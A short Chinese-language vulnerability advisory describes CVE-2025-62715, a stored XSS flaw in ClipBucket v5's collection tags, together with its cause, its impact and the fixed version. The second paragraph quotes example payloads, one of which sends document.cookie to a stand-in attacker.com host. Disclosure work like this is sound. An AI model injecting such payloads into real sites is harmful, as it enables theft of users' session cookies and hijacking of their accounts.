CVE-2025-62715CVE-2025-62715是ClipBucket v5开源视频分享平台中的一个存储型跨站脚本(XSS)漏洞。该漏洞存在于ClipBucket的收藏标签(Collection Tags)功能中,影响版本5.5.2-#147及以下版本。攻击者可以通过创建一个包含恶意HTML或JavaScript代码的标签,当其他用户访问收藏详情页或标签列表页时,这些恶意代码会被浏览器执行,从而窃取用户会话Cookie、劫持用户账户或进行其他恶意操作。由于是存储型XSS,恶意脚本会持久保存在服务器端,所有访问受影响页面的用户都会受到攻击。该漏洞需要攻击者具有低权限的认证用户身份,但不需要特殊权限即可实施攻击。攻击成功后可能影响所有查看受影响页面的用户,造成机密信息和用户隐私的泄露。
漏洞根源在于ClipBucket v5的收藏标签功能对用户输入未进行充分的输入验证和输出编码。攻击者以低权限认证用户身份登录系统后,可以在创建收藏标签时注入恶意的HTML或JavaScript代码。例如,攻击者可以构造如<script>alert(document.cookie)</script>或<img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>等Payload。当其他用户访问包含该标签的收藏详情页(collection detail page)或标签列表页(tag-list page)时,服务器从数据库中取出存储的标签内容并直接输出到HTML页面中,由于缺少必要的HTML实体编码或输出过滤,浏览器会将恶意代码作为正常脚本执行。攻击者可以利用此漏洞窃取受害者的认证令牌、修改页面内容进行钓鱼攻击、或在用户浏览器中执行任意JavaScript代码。修复版本5.5.2-#152通过添加输入过滤和输出编码解决了此问题。